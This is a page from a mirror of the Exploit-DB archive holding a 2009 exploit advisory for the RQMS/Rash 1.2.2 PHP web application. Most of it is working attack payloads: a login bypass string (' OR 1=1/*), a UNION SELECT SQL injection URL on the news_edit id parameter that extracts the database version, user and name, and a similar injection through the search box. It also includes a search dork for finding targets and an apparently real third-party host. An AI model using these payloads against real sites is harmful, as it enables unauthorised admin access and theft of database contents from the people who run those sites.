bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8433.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

28 lines
No EOL
1 KiB
Text
Raw Blame History

########################################
#
# Product : RQMS
# Version : 1.2.2
# Dork : Rash Version: 1.2.1
# Site: http://rqms.sourceforge.net
# Found by: Dimi4
# Greetz: UASC (http://uasc.org.ua), antichat
#
########################################
Multiple Remote Vulnerabilities
Need: magic_quotes_gpc = OFF
1)Auth BYPASS
http://127.0.0.1/rash-v1.2.2/?admin
Login: ' OR 1=1/*
2) Sql-injection
http://nocude.maisum.net/?admin
http://target/rash-v1.2.2/?news_edit&id=4'+union+select+1,concat_ws(0x3a,version(),user(),database()),3/*
3) Sql-inj in Search
http://target//rash-v1.2.2/?search
Search: ' union select database(),version(),user(),4,5,6/*
# (c) Dimi4, UASC (http://uasc.org.ua)
# milw0rm.com [2009-04-14]
Reference in a new issue View git blame Copy permalink